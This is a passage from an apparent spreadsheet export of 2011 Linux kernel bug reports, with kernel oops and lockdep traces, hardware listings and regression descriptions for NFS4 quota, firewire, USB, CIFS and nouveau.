RIP: 0010:[] [] acpi_idle_enter_bm+0x1ba/0x1ed [processor] [ 9357.607095] RSP: 0018:ffffffff8173bf18 EFLAGS: 00000246 [ 9357.607098] RAX: 00000882bcd77470 RBX: 00000000ffffffff RCX: 00000882bccf66b0 [ 9357.607102] RDX: 00000882bcd77470 RSI: 00000882bcd77470 RDI: 0000000000000035 [ 9357.607105] RBP: ffff88003c26e000 R08: 0000000000000000 R09: 00000000000000bb [ 9357.607108] R10: 0000000000000001 R11: dead000000200200 R12: ffffffff8153b30e [ 9357.607111] R13: 00000000000000bb R14: ffffffff8104dbb6 R15: 0000000000000000 [ 9357.607115] FS: 0000000000000000(0000) GS:ffffffff81754000(0000) knlGS:0000000000000000 [ 9357.607119] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b [ 9357.607122] CR2: 00007f5446b5f000 CR3: 000000003ba9c000 CR4: 00000000000006f0 [ 9357.607125] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 9357.607128] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 [ 9357.607132] Process swapper (pid: 0, threadinfo ffffffff8173a000, task ffffffff8174c040) [ 9357.607134] Stack: [ 9357.607138] ffffffff810485c3 0000000000003e80 ffff88003c26e020 ffff88003c26e020 [ 9357.607143] ffff88003c26e150 ffff88003f67a380 ffffffffffffffff ffffffff813e357a [ 9357.607147] ffffffff817f7b60 ffffffff8173a000 ffffffff817f7b60 ffffffff81001272 [ 9357.607152] Call Trace: [ 9357.607160] [] ? pm_qos_request+0x23/0x48 [ 9357.607168] [] ? cpuidle_idle_call+0x87/0xc4 [ 9357.607173] [] ? cpu_idle+0x79/0x9b [ 9357.607178] [] ? start_kernel+0x388/0x393 [ 9357.607182] [] ? x86_64_start_kernel+0xfa/0x100 [ 9357.607184] Code: ff 0d fa 19 00 00 e8 59 7f fa e0 48 89 c7 b9 e8 03 00 00 31 d2 4c 29 e7 48 89 f8 48 f7 f1 49 89 c4 e8 17 5e fa e0 fb 80 7b 08 01 &lt;74&gt; 0f 48 8b 04 25 48 30 75 81 83 88 3c e0 ff ff 04 ff 43 18 31 [ 9357.607215] Call Trace: [ 9357.607219] [] ? pm_qos_request+0x23/0x48 [ 9357.607223] [] ? cpuidle_idle_call+0x87/0xc4 [ 9357.607227] [] ? cpu_idle+0x79/0x9b [ 9357.607231] [] ? start_kernel+0x388/0x393 [ 9357.607235] [] ? x86_64_start_kernel+0xfa/0x100 --------------------------------------------------- found on Slackware 13.1 bash-4.1$ uname -a Linux granit 2.6.38 #3 Sat Mar 19 19:39:42 CET 2011 x86_64 Intel(R) Celeron(R) M CPU 520 @ 1.60GHz GenuineIntel GNU/Linux glibc-2.11.1</t>
  </si>
  <si>
    <t>2.6.38: Quota over NFS4</t>
  </si>
  <si>
    <t>2011-03-20 19:48 UTC</t>
  </si>
  <si>
    <t>2011-05-03 02:31 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.38: Quota over NFS4 Submitter : Adam Lackorzynski &lt;adam@os.inf.tu-dresden.de&gt; Date : 2011-03-17 13:32 Message-ID : 20110317133247.GB6424@os.inf.tu-dresden.de References : http://marc.info/?l=linux-kernel&amp;m=130036878203485&amp;w=2 This entry is being used for tracking a regression from 2.6.37. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>BUG in vb_alloc() - firewire crash at boot</t>
  </si>
  <si>
    <t>2011-03-21 12:40 UTC</t>
  </si>
  <si>
    <t>2011-08-15 09:19 UTC</t>
  </si>
  <si>
    <t>firewire_ohci</t>
  </si>
  <si>
    <t>Created attachment 51502 [details] photo of oops Computer crash randomly at boot with one flashdisk or usb cdrom connected. Tested with kernel 2.6.38-rc2 and 2.6.38. Computer: AMD Phenom x6, M4A88TD-V EVO/USB3 motherboard, 8GB RAM. lspci: 00:00.0 Host bridge: Advanced Micro Devices [AMD] RS880 Host Bridge 00:01.0 PCI bridge: ASUSTeK Computer Inc. RS880 PCI to PCI bridge (int gfx) 00:09.0 PCI bridge: Advanced Micro Devices [AMD] RS780/RS880 PCI to PCI bridge (PCIE port 4) 00:0a.0 PCI bridge: Advanced Micro Devices [AMD] RS780/RS880 PCI to PCI bridge (PCIE port 5) 00:11.0 SATA controller: ATI Technologies Inc SB700/SB800 SATA Controller [IDE mode] (rev 40) 00:12.0 USB Controller: ATI Technologies Inc SB700/SB800 USB OHCI0 Controller 00:12.2 USB Controller: ATI Technologies Inc SB700/SB800 USB EHCI Controller 00:13.0 USB Controller: ATI Technologies Inc SB700/SB800 USB OHCI0 Controller 00:13.2 USB Controller: ATI Technologies Inc SB700/SB800 USB EHCI Controller 00:14.0 SMBus: ATI Technologies Inc SBx00 SMBus Controller (rev 42) 00:14.1 IDE interface: ATI Technologies Inc SB700/SB800 IDE Controller (rev 40) 00:14.2 Audio device: ATI Technologies Inc SBx00 Azalia (Intel HDA) (rev 40) 00:14.3 ISA bridge: ATI Technologies Inc SB700/SB800 LPC host controller (rev 40) 00:14.4 PCI bridge: ATI Technologies Inc SBx00 PCI to PCI Bridge (rev 40) 00:14.5 USB Controller: ATI Technologies Inc SB700/SB800 USB OHCI2 Controller 00:15.0 PCI bridge: ATI Technologies Inc Device 43a0 00:15.1 PCI bridge: ATI Technologies Inc Device 43a1 00:16.0 USB Controller: ATI Technologies Inc SB700/SB800 USB OHCI0 Controller 00:16.2 USB Controller: ATI Technologies Inc SB700/SB800 USB EHCI Controller 00:18.0 Host bridge: Advanced Micro Devices [AMD] Family 10h Processor HyperTransport Configuration 00:18.1 Host bridge: Advanced Micro Devices [AMD] Family 10h Processor Address Map 00:18.2 Host bridge: Advanced Micro Devices [AMD] Family 10h Processor DRAM Controller 00:18.3 Host bridge: Advanced Micro Devices [AMD] Family 10h Processor Miscellaneous Control 00:18.4 Host bridge: Advanced Micro Devices [AMD] Family 10h Processor Link Control 01:05.0 VGA compatible controller: ATI Technologies Inc RS880 [Radeon HD 4250] 01:05.1 Audio device: ATI Technologies Inc RS880 Audio Device [Radeon HD 4200] 02:00.0 FireWire (IEEE 1394): VIA Technologies, Inc. VT6315 Series Firewire Controller 02:00.1 IDE interface: VIA Technologies, Inc. VT6415 PATA IDE Host Controller (rev a0) 03:00.0 USB Controller: NEC Corporation uPD720200 USB 3.0 Host Controller (rev 03) 06:00.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL8111/8168B PCI Express Gigabit Ethernet controller (rev 06)</t>
  </si>
  <si>
    <t>Dell 1546: Usb doesn't work at all</t>
  </si>
  <si>
    <t>2011-03-21 20:10 UTC</t>
  </si>
  <si>
    <t>thuban</t>
  </si>
  <si>
    <t>2012-06-13 15:04 UTC</t>
  </si>
  <si>
    <t>I'm running on debian GNU/Linux sid amd64, and with the last kernel, usb don't work. The boot process is very slow while it is testing usb. Here are the errors : [ 4.220159] ehci_hcd 0000:00:12.2: USB bus 1 deregistered [ 4.236511] ehci_hcd 0000:00:13.2: new USB bus registered, assigned bus number 1 [ 4.248317] ehci_hcd 0000:00:13.2: applying AMD SB600/SB700 USB freeze workaround [ 4.272351] ehci_hcd 0000:00:13.2: USB bus 1 deregistered [ 4.292423] ohci_hcd 0000:00:12.0: new USB bus registered, assigned bus number 1 [ 12.304254] ohci_hcd 0000:00:12.0: USB HC takeover failed! (BIOS/SMM bug) [ 12.304361] ohci_hcd 0000:00:12.0: USB bus 1 deregistered [ 12.320396] ohci_hcd 0000:00:12.1: new USB bus registered, assigned bus number 1 [ 20.320259] ohci_hcd 0000:00:12.1: USB HC takeover failed! (BIOS/SMM bug) [ 20.320366] ohci_hcd 0000:00:12.1: USB bus 1 deregistered [ 20.336421] ohci_hcd 0000:00:13.0: new USB bus registered, assigned bus number 1 [ 28.352251] ohci_hcd 0000:00:13.0: USB HC takeover failed! (BIOS/SMM bug) [ 28.352352] ohci_hcd 0000:00:13.0: USB bus 1 deregistered [ 28.368373] ohci_hcd 0000:00:13.1: new USB bus registered, assigned bus number 1 [ 36.380253] ohci_hcd 0000:00:13.1: USB HC takeover failed! (BIOS/SMM bug) [ 36.380358] ohci_hcd 0000:00:13.1: USB bus 1 deregistered</t>
  </si>
  <si>
    <t>CIFS client performance regression  &gt;=2.6.36</t>
  </si>
  <si>
    <t>2011-03-22 15:45 UTC</t>
  </si>
  <si>
    <t>Till</t>
  </si>
  <si>
    <t>2011-04-20 06:12 UTC</t>
  </si>
  <si>
    <t>The CIFS Performance drops to 4-12 MiB/s (30-50 MiB/s in gentoo-sources-2.6.34-r12) when using a Kernel &gt;= 2.6.36 (36-r5, 37-r1 and 38 tested). This happens for gentoo-sources as for vanilla-sources. Some people report 60 MiB/s if they use smbclient/get (non kernel implementation) and only 8 MiB/s with mount.cifs. (see also the forum discussion: https://forums.gentoo.org/viewtopic.php?p=6600761#6600761 and the gentoo bug report: https://bugs.gentoo.org/show_bug.cgi?id=357463) Reproducible: Always Steps to Reproduce: 1. install kernel &gt;= 2.6.36 2. use mount.cifs 3. dd if=/samba/share of=/dev/null bs=1M count=1k Actual Results: slow speed (4-12 MB/s) Expected Results: higher speed (30-50 MB/s)</t>
  </si>
  <si>
    <t>nouveau: lockdep spew</t>
  </si>
  <si>
    <t>2011-03-24 09:51 UTC</t>
  </si>
  <si>
    <t>2011-05-15 09:15 UTC</t>
  </si>
  <si>
    <t>[ 17.225800] ========================================================= [ 17.225805] [ INFO: possible irq lock inversion dependency detected ] [ 17.225808] 2.6.38-wl-65107-gc5f1016-dirty #211 [ 17.225810] --------------------------------------------------------- [ 17.225813] modprobe/2506 just changed the state of lock: [ 17.225816] (&amp;(&amp;dev_priv-&gt;context_switch_lock)-&gt;rlock){-.....}, at: [&lt;ffffffffa07e93bf&gt;] nouveau_irq_handler+0x5f/0x130 [nouveau] [ 17.225842] but this lock took another, HARDIRQ-unsafe lock in the past: [ 17.225844] (&amp;(&amp;dev_priv-&gt;ramin_lock)-&gt;rlock){+.+...} [ 17.225847] [ 17.225848] and interrupts could create inverse lock ordering between them. [ 17.225849] [ 17.225851] [ 17.225852] other info that might help us debug this: [ 17.225855] 5 locks held by modprobe/2506: [ 17.225857] #0: (&amp;__lockdep_no_validate__){+.+.+.}, at: [&lt;ffffffff8132f30b&gt;] __driver_attach+0x5b/0xb0 [ 17.225869] #1: (&amp;__lockdep_no_validate__){+.+.+.}, at: [&lt;ffffffff8132f319&gt;] __driver_attach+0x69/0xb0 [ 17.225877] #2: (drm_global_mutex){+.+.+.}, at: [&lt;ffffffffa0759202&gt;] drm_get_pci_dev+0x102/0x2c0 [drm] [ 17.225896] #3: (&amp;chan-&gt;mutex){+.+.+.}, at: [&lt;ffffffffa07e55d4&gt;] nouveau_channel_alloc+0xc4/0x470 [nouveau] [ 17.225915] #4: (&amp;sb-&gt;s_type-&gt;i_mutex_key#2){+.+.+.}, at: [&lt;ffffffff8122e367&gt;] debugfs_create_by_name+0x57/0x1d0 [ 17.225926] [ 17.225927] the shortest dependencies between 2nd lock and 1st lock: [ 17.225953] -&gt; (&amp;(&amp;dev_priv-&gt;ramin_lock)-&gt;rlock){+.+...} ops: 24860 { [ 17.225960] HARDIRQ-ON-W at: [ 17.225963] [&lt;ffffffff81084fab&gt;] mark_irqflags+0x13b/0x1c0 [ 17.225970] [&lt;ffffffff8108716c&gt;] __lock_acquire+0x5ac/0xa80 [ 17.225975] [&lt;ffffffff81087d4e&gt;] lock_acquire+0x9e/0x1d0 [ 17.225980] [&lt;ffffffff8149bdf0&gt;] _raw_spin_lock+0x40/0x80 [ 17.225986] [&lt;ffffffffa07e82c1&gt;] nouveau_gpuobj_new+0xb1/0x2d0 [nouveau] [ 17.226002] [&lt;ffffffffa0844cec&gt;] nv50_instmem_init+0x13c/0x530 [nouveau] [ 17.226024] [&lt;ffffffffa07e41db&gt;] nouveau_card_init+0x12b/0x3d0 [nouveau] [ 17.226039] [&lt;ffffffffa07e47c9&gt;] nouveau_load+0x329/0x550 [nouveau] [ 17.226055] [&lt;ffffffffa0759290&gt;] drm_get_pci_dev+0x190/0x2c0 [drm] [ 17.226066] [&lt;ffffffffa0861e79&gt;] nouveau_pci_probe+0x15/0x17 [nouveau] [ 17.226084] [&lt;ffffffff81296cdf&gt;] local_pci_probe+0x5f/0xd0 [ 17.226090] [&lt;ffffffff81297458&gt;] pci_device_probe+0x88/0xb0 [ 17.226095] [&lt;ffffffff8132ef78&gt;] really_probe+0x68/0x190 [ 17.226100] [&lt;ffffffff8132f285&gt;] driver_probe_device+0x45/0x70 [ 17.226105] [&lt;ffffffff8132f35b&gt;] __driver_attach+0xab/0xb0 [ 17.226110] [&lt;ffffffff8132e096&gt;] bus_for_each_dev+0x66/0x90 [ 17.226115] [&lt;ffffffff8132edce&gt;] driver_attach+0x1e/0x20 [ 17.226120] [&lt;ffffffff8132e998&gt;] bus_add_driver+0x158/0x290 [ 17.226125] [&lt;ffffffff8132f614&gt;] driver_register+0x74/0x130 [ 17.226130] [&lt;ffffffff812976d6&gt;] __pci_register_driver+0x66/0xe0 [ 17.226135] [&lt;ffffffffa075977f&gt;] drm_pci_init+0xdf/0xf0 [drm] [ 17.226146] [&lt;ffffffffa0750748&gt;] drm_init+0x58/0x70 [drm] [ 17.226155] [&lt;ffffffffa0887048&gt;] nouveau_init+0x48/0x4a [nouveau] [ 17.226169] [&lt;ffffffff810002e4&gt;] do_one_initcall+0x44/0x180 [ 17.226175] [&lt;ffffffff8109693a&gt;] sys_init_module+0xca/0x210 [ 17.226181] [&lt;ffffffff8100268b&gt;] system_call_fastpath+0x16/0x1b [ 17.226186] SOFTIRQ-ON-W at: [ 17.226189] [&lt;ffffffff81084fcf&gt;] mark_irqflags+0x15f/0x1c0 [ 17.226194] [&lt;ffffffff8108716c&gt;] __lock_acquire+0x5ac/0xa80 [ 17.226199] [&lt;ffffffff81087d4e&gt;] lock_acquire+0x9e/0x1d0 [ 17.226204] [&lt;ffffffff8149bdf0&gt;] _raw_spin_lock+0x40/0x80 [ 17.226208] [&lt;ffffffffa07e82c1&gt;] nouveau_gpuobj_new+0xb1/0x2d0 [nouveau] [ 17.226225] [&lt;ffffffffa0844cec&gt;] nv50_instmem_init+0x13c/0x530 [nouveau] [ 17.226244] [&lt;ffffffffa07e41db&gt;] nouveau_card_init+0x12b/0x3d0 [nouveau] [ 17.226260] [&lt;ffffffffa07e47c9&gt;] nouveau_load+0x329/0x550 [nouveau] [ 17.226275] [&lt;ffffffffa0759290&gt;] drm_get_pci_dev+0x190/0x2c0 [drm] [ 17.226286] [&lt;ffffffffa0861e79&gt;] nouveau_pci_probe+0x15/0x17 [nouveau] [ 17.226303] [&lt;ffffffff81296cdf&gt;] local_pci_probe+0x5f/0xd0 [ 17.226309] [&lt;ffffffff81297458&gt;] pci_device_probe+0x88/0xb0 [ 17.226314] [&lt;ffffffff8132ef78&gt;] really_probe+0x68/0x190 [ 17.226319] [&lt;ffffffff8132f285&gt;] driver_probe_device+0x45/0x70 [ 17.226324] [&lt;ffffffff8132f35b&gt;] __driver_attach+0xab/0xb0 [ 17.226329] [&lt;ffffffff8132e096&gt;] bus_for_each_dev+0x66/0x90 [ 17.226334] [&lt;ffffffff8132edce&gt;] driver_attach+0x1e/0x20 [ 17.226339] [&lt;ffffffff8132e998&gt;] bus_add_driver+0x158/0x290 [ 17.226343] [&lt;ffffffff8132f614&gt;] driver_register+0x74/0x130 [ 17.226348] [&lt;ffffffff812976d6&gt;] __pci_register_driver+0x66/0xe0 [ 17.226354] [&lt;ffffffffa075977f&gt;] drm_pci_init+0xdf/0xf0 [drm] [ 17.226364] [&lt;ffffffffa0750748&gt;] drm_init+0x58/0x70 [drm] [ 17.226373] [&lt;ffffffffa0887048&gt;] nouveau_init+0x48/0x4a [nouveau] [ 17.226387] [&lt;ffffffff810002e4&gt;] do_one_initcall+0x44/0x180 [ 17.226392] [&lt;ffffffff8109693a&gt;] sys_init_module+0xca/0x210 [ 17.226397] [&lt;ffffffff8100268b&gt;] system_call_fastpath+0x16/0x1b [ 17.226402] INITIAL USE at: [ 17.226405] [&lt;ffffffff81086f9a&gt;] __lock_acquire+0x3da/0xa80 [ 17.226410] [&lt;ffffffff81087d4e&gt;] lock_acquire+0x9e/0x1d0 [ 17.226415] [&lt;ffffffff8149bdf0&gt;] _raw_spin_lock+0x40/0x80 [ 17.226420] [&lt;ffffffffa07e82c1&gt;] nouveau_gpuobj_new+0xb1/0x2d0 [nouveau] [ 17.226436] [&lt;ffffffffa0844cec&gt;] nv50_instmem_init+0x13c/0x530 [nouveau] [ 17.226456] [&lt;ffffffffa07e41db&gt;] nouveau_card_init+0x12b/0x3d0 [nouveau] [ 17.226471] [&lt;ffffffffa07e47c9&gt;] nouveau_load+0x329/0x550 [nouveau] [ 17.226486] [&lt;ffffffffa0759290&gt;] drm_get_pci_dev+0x190/0x2c0 [drm] [ 17.226497] [&lt;ffffffffa0861e79&gt;] nouveau_pci_probe+0x15/0x17 [nouveau] [ 17.226514] [&lt;ffffffff81296cdf&gt;] local_pci_probe+0x5f/0xd0 [ 17.226520] [&lt;ffffffff81297458&gt;] pci_device_probe+0x88/0xb0 [ 17.226525] [&lt;ffffffff8132ef78&gt;] really_probe+0x68/0x190 [ 17.226530] [&lt;ffffffff8132f285&gt;] driver_probe_device+0x45/0x70 [ 17.226535] [&lt;ffffffff8132f35b&gt;] __driver_attach+0xab/0xb0 [ 17.226540] [&lt;ffffffff8132e096&gt;] bus_for_each_dev+0x66/0x90 [ 17.226545] [&lt;ffffffff8132edce&gt;] driver_attach+0x1e/0x20 [ 17.226549] [&lt;ffffffff8132e998&gt;] bus_add_driver+0x158/0x290 [ 17.226554] [&lt;ffffffff8132f614&gt;] driver_register+0x74/0x130 [ 17.226559] [&lt;ffffffff812976d6&gt;] __pci_register_driver+0x66/0xe0 [ 17.226564] [&lt;ffffffffa075977f&gt;] drm_pci_init+0xdf/0xf0 [drm] [ 17.226575] [&lt;ffffffffa0750748&gt;] drm_init+0x58/0x70 [drm] [ 17.226583] [&lt;ffffffffa0887048&gt;] nouveau_init+0x48/0x4a [nouveau] [ 17.226597] [&lt;ffffffff810002e4&gt;] do_one_initcall+0x44/0x180 [ 17.226602] [&lt;ffffffff8109693a&gt;] sys_init_module+0xca/0x210 [ 17.226607] [&lt;ffffffff8100268b&gt;] system_call_fastpath+0x16/0x1b [ 17.226612] } [ 17.226614] ... key at: [&lt;ffffffffa0875d18&gt;] __key.34306+0x0/0xfffffffffffec192 [nouveau] [ 17.226628] ... acquired at: [ 17.226630] [&lt;ffffffff810841b1&gt;] validate_chain.clone.19+0x5b1/0x6f0 [ 17.226634] [&lt;ffffffff8108705d&gt;] __lock_acquire+0x49d/0xa80 [ 17.226638] [&lt;ffffffff81087d4e&gt;] lock_acquire+0x9e/0x1d0 [ 17.226643] [&lt;ffffffff8149bdf0&gt;] _raw_spin_lock+0x40/0x80 [ 17.226647] [&lt;ffffffffa08451e2&gt;] nv84_instmem_flush+0x22/0xa0 [nouveau] [ 17.226666] [&lt;ffffffffa081404c&gt;] nv50_fifo_create_context+0x26c/0x350 [nouveau] [ 17.226685] [&lt;ffffffffa07e573c&gt;] nouveau_channel_alloc+0x22c/0x470 [nouveau] [ 17.226700] [&lt;ffffffffa07e3df1&gt;] nouveau_card_init_channel+0x51/0x170 [nouveau] [ 17.226715] [&lt;ffffffffa07e4308&gt;] nouveau_card_init+0x258/0x3d0 [nouveau] [ 17.226730] [&lt;ffffffffa07e47c9&gt;] nouveau_load+0x329/0x550 [nouveau] [ 17.226745] [&lt;ffffffffa0759290&gt;] drm_get_pci_dev+0x190/0x2c0 [drm] [ 17.226755] [&lt;ffffffffa0861e79&gt;] nouveau_pci_probe+0x15/0x17 [nouveau] [ 17.226772] [&lt;ffffffff81296cdf&gt;] local_pci_probe+0x5f/0xd0 [ 17.226777] [&lt;ffffffff81297458&gt;] pci_device_probe+0x88/0xb0 [ 17.226781] [&lt;ffffffff8132ef78&gt;] really_probe+0x68/0x190 [ 17.226786] [&lt;ffffffff8132f285&gt;] driver_probe_device+0x45/0x70 [ 17.226791] [&lt;ffffffff8132f35b&gt;] __driver_attach+0xab/0xb0 [ 17.226795] [&lt;ffffffff8132e096&gt;] bus_for_each_dev+0x66/0x90 [ 17.226800] [&lt;ffffffff8132edce&gt;] driver_attach+0x1e/0x20 [ 17.226804] [&lt;ffffffff8132e998&gt;] bus_add_driver+0x158/0x290 [ 17.226808] [&lt;ffffffff8132f614&gt;] driver_register+0x74/0x130 [ 17.226813] [&lt;ffffffff812976d6&gt;] __pci_register_driver+0x66/0xe0 [ 17.226817] [&lt;ffffffffa075977f&gt;] drm_pci_init+0xdf/0xf0 [drm] [ 17.226827] [&lt;ffffffffa0750748&gt;] drm_init+0x58/0x70 [drm] [ 17.226836] [&lt;ffffffffa0887048&gt;] nouveau_init+0x48/0x4a [nouveau] [ 17.226849] [&lt;ffffffff810002e4&gt;] do_one_initcall+0x44/0x180 [ 17.226853] [&lt;ffffffff8109693a&gt;] sys_init_module+0xca/0x210 [ 17.226858] [&lt;ffffffff8100268b&gt;] system_call_fastpath+0x16/0x1b [ 17.226862] [ 17.226864] -&gt; (&amp;(&amp;dev_priv-&gt;context_switch_lock)-&gt;rlock){-.....} ops: 6 { [ 17.226870] IN-HARDIRQ-W at: [ 17.226873] [&lt;ffffffff8108500d&gt;] mark_irqflags+0x19d/0x1c0 [ 17.226878] [&lt;ffffffff8108716c&gt;] __lock_acquire+0x5ac/0xa80 [ 17.226883] [&lt;ffffffff81087d4e&gt;] lock_acquire+0x9e/0x1d0 [ 17.226887] [&lt;ffffffff8149bfa2&gt;] _raw_spin_lock_irqsave+0x52/0x90 [ 17.226892] [&lt;ffffffffa07e93bf&gt;] nouveau_irq_handler+0x5f/0x130 [nouveau] [ 17.226909] [&lt;ffffffff810a6fd9&gt;] handle_IRQ_event+0x79/0x2f0 [ 17.226915] [&lt;ffffffff810a99fd&gt;] handle_fasteoi_irq+0x7d/0x100 [ 17.226920] [&lt;ffffffff81004e52&gt;] handle_irq+0x22/0x40 [ 17.226925] [&lt;ffffffff81004add&gt;] do_IRQ+0x5d/0xe0 [ 17.226930] [&lt;ffffffff8149d153&gt;] ret_from_intr+0x0/0x13 [ 17.226935] [&lt;ffffffff8149a523&gt;] mutex_lock_nested+0x73/0x3b0 [ 17.226940] [&lt;ffffffff8122e367&gt;] debugfs_create_by_name+0x57/0x1d0 [ 17.226945] [&lt;ffffffff8122e568&gt;] debugfs_create_file+0x88/0xb0 [ 17.226950] [&lt;ffffffff8122e62b&gt;] debugfs_create_dir+0x1b/0x20 [ 17.226954] [&lt;ffffffffa086141a&gt;] nouveau_debugfs_channel_init+0xca/0xf0 [nouveau] [ 17.226974] [&lt;ffffffffa07e57d1&gt;] nouveau_channel_alloc+0x2c1/0x470 [nouveau] [ 17.226990] [&lt;ffffffffa07e3df1&gt;] nouveau_card_init_channel+0x51/0x170 [nouveau] [ 17.227005] [&lt;ffffffffa07e4308&gt;] nouveau_card_init+0x258/0x3d0 [nouveau] [ 17.227021] [&lt;ffffffffa07e47c9&gt;] nouveau_load+0x329/0x550 [nouveau] [ 17.227036] [&lt;ffffffffa0759290&gt;] drm_get_pci_dev+0x190/0x2c0 [drm] [ 17.227047] [&lt;ffffffffa0861e79&gt;] nouveau_pci_probe+0x15/0x17 [nouveau] [ 17.227065] [&lt;ffffffff81296cdf&gt;] local_pci_probe+0x5f/0xd0 [ 17.227070] [&lt;ffffffff81297458&gt;] pci_device_probe+0x88/0xb0 [ 17.227075] [&lt;ffffffff8132ef78&gt;] really_probe+0x68/0x190 [ 17.227080] [&lt;ffffffff8132f285&gt;] driver_probe_device+0x45/0x70 [ 17.227085] [&lt;ffffffff8132f35b&gt;] __driver_attach+0xab/0xb0 [ 17.227090] [&lt;ffffffff8132e096&gt;] bus_for_each_dev+0x66/0x90 [ 17.227095] [&lt;ffffffff8132edce&gt;] driver_attach+0x1e/0x20 [ 17.227100] [&lt;ffffffff8132e998&gt;] bus_add_driver+0x158/0x290 [ 17.227105] [&lt;ffffffff8132f614&gt;] driver_register+0x74/0x130 [ 17.227110] [&lt;ffffffff812976d6&gt;] __pci_register_driver+0x66/0xe0 [ 17.227115] [&lt;ffffffffa075977f&gt;] drm_pci_init+0xdf/0xf0 [drm] [ 17.227125] [&lt;ffffffffa0750748&gt;] drm_init+0x58/0x70 [drm] [ 17.227134] [&lt;ffffffffa0887048&gt;] nouveau_init+0x48/0x4a [nouveau] [ 17.227148] [&lt;ffffffff810002e4&gt;] do_one_initcall+0x44/0x180 [ 17.227153] [&lt;ffffffff8109693a&gt;] sys_init_module+0xca/0x210 [ 17.227158] [&lt;ffffffff8100268b&gt;] system_call_fastpath+0x16/0x1b [ 17.227163] INITIAL USE at: [ 17.227166] [&lt;ffffffff81086f9a&gt;] __lock_acquire+0x3da/0xa80 [ 17.227171] [&lt;ffffffff81087d4e&gt;] lock_acquire+0x9e/0x1d0 [ 17.227175] [&lt;ffffffff8149bfa2&gt;] _raw_spin_lock_irqsave+0x52/0x90 [ 17.227180] [&lt;ffffffffa07e95bf&gt;] nouveau_irq_register+0x3f/0x70 [nouveau] [ 17.227197] [&lt;ffffffffa085f5e2&gt;] nv50_gpio_init+0x82/0x150 [nouveau] [ 17.227217] [&lt;ffffffffa07e4218&gt;] nouveau_card_init+0x168/0x3d0 [nouveau] [ 17.227233] [&lt;ffffffffa07e47c9&gt;] nouveau_load+0x329/0x550 [nouveau] [ 17.227248] [&lt;ffffffffa0759290&gt;] drm_get_pci_dev+0x190/0x2c0 [drm] [ 17.227259] [&lt;ffffffffa0861e79&gt;] nouveau_pci_probe+0x15/0x17 [nouveau] [ 17.227276] [&lt;ffffffff81296cdf&gt;] local_pci_probe+0x5f/0xd0 [ 17.227281] [&lt;ffffffff81297458&gt;] pci_device_probe+0x88/0xb0 [ 17.227286] [&lt;ffffffff8132ef78&gt;] really_probe+0x68/0x190 [ 17.227291] [&lt;ffffffff8132f285&gt;] driver_probe_device+0x45/0x70 [ 17.227296] [&lt;ffffffff8132f35b&gt;] __driver_attach+0xab/0xb0 [ 17.227301] [&lt;ffffffff8132e096&gt;] bus_for_each_dev+0x66/0x90 [ 17.227306] [&lt;ffffffff8132edce&gt;] driver_attach+0x1e/0x20 [ 17.227310] [&lt;ffffffff8132e998&gt;] bus_add_driver+0x158/0x290 [ 17.227315] [&lt;ffffffff8132f614&gt;] driver_register+0x74/0x130 [ 17.227320] [&lt;ffffffff812976d6&gt;] __pci_register_driver+0x66/0xe0 [ 17.227325] [&lt;ffffffffa075977f&gt;] drm_pci_init+0xdf/0xf0 [drm] [ 17.227336] [&lt;ffffffffa0750748&gt;] drm_init+0x58/0x70 [drm] [ 17.227344] [&lt;ffffffffa0887048&gt;] nouveau_init+0x48/0x4a [nouveau] [ 17.227358] [&lt;ffffffff810002e4&gt;] do_one_initcall+0x44/0x180 [ 17.227363] [&lt;ffffffff8109693a&gt;] sys_init_module+0xca/0x210 [ 17.227368] [&lt;ffffffff8100268b&gt;] system_call_fastpath+0x16/0x1b [ 17.227373] } [ 17.227374] ... key at: [&lt;ffffffffa0875cf8&gt;] __key.34928+0x0/0xfffffffffffec1b2 [nouveau] [ 17.227388] ... acquired at: [ 17.227390] [&lt;ffffffff81082cb9&gt;] check_usage_forwards+0x89/0x100 [ 17.227395] [&lt;ffffffff81084839&gt;] mark_lock_irq+0x99/0x2b0 [ 17.227399] [&lt;ffffffff81084bc1&gt;] mark_lock+0x171/0x420 [ 17.227403] [&lt;ffffffff8108500d&gt;] mark_irqflags+0x19d/0x1c0 [ 17.227407] [&lt;ffffffff8108716c&gt;] __lock_acquire+0x5ac/0xa80 [ 17.227411] [&lt;ffffffff81087d4e&gt;] lock_acquire+0x9e/0x1d0 [ 17.227416] [&lt;ffffffff8149bfa2&gt;] _raw_spin_lock_irqsave+0x52/0x90 [ 17.227420] [&lt;ffffffffa07e93bf&gt;] nouveau_irq_handler+0x5f/0x130 [nouveau] [ 17.227436] [&lt;ffffffff810a6fd9&gt;] handle_IRQ_event+0x79/0x2f0 [ 17.227440] [&lt;ffffffff810a99fd&gt;] handle_fasteoi_irq+0x7d/0x100 [ 17.227445] [&lt;ffffffff81004e52&gt;] handle_irq+0x22/0x40 [ 17.227449] [&lt;ffffffff81004add&gt;] do_IRQ+0x5d/0xe0 [ 17.227453] [&lt;ffffffff8149d153&gt;] ret_from_intr+0x0/0x13 [ 17.227457] [&lt;ffffffff8149a523&gt;] mutex_lock_nested+0x73/0x3b0 [ 17.227461] [&lt;ffffffff8122e367&gt;] debugfs_create_by_name+0x57/0x1d0 [ 17.227466] [&lt;ffffffff8122e568&gt;] debugfs_create_file+0x88/0xb0 [ 17.227470] [&lt;ffffffff8122e62b&gt;] debugfs_create_dir+0x1b/0x20 [ 17.227474] [&lt;ffffffffa086141a&gt;] nouveau_debugfs_channel_init+0xca/0xf0 [nouveau] [ 17.227493] [&lt;ffffffffa07e57d1&gt;] nouveau_channel_alloc+0x2c1/0x470 [nouveau] [ 17.227508] [&lt;ffffffffa07e3df1&gt;] nouveau_card_init_channel+0x51/0x170 [nouveau] [ 17.227523] [&lt;ffffffffa07e4308&gt;] nouveau_card_init+0x258/0x3d0 [nouveau] [ 17.227538] [&lt;ffffffffa07e47c9&gt;] nouveau_load+0x329/0x550 [nouveau] [ 17.227553] [&lt;ffffffffa0759290&gt;] drm_get_pci_dev+0x190/0x2c0 [drm] [ 17.227563] [&lt;ffffffffa0861e79&gt;] nouveau_pci_probe+0x15/0x17 [nouveau] [ 17.227580] [&lt;ffffffff81296cdf&gt;] local_pci_probe+0x5f/0xd0 [ 17.227585] [&lt;ffffffff81297458&gt;] pci_device_probe+0x88/0xb0 [ 17.227589] 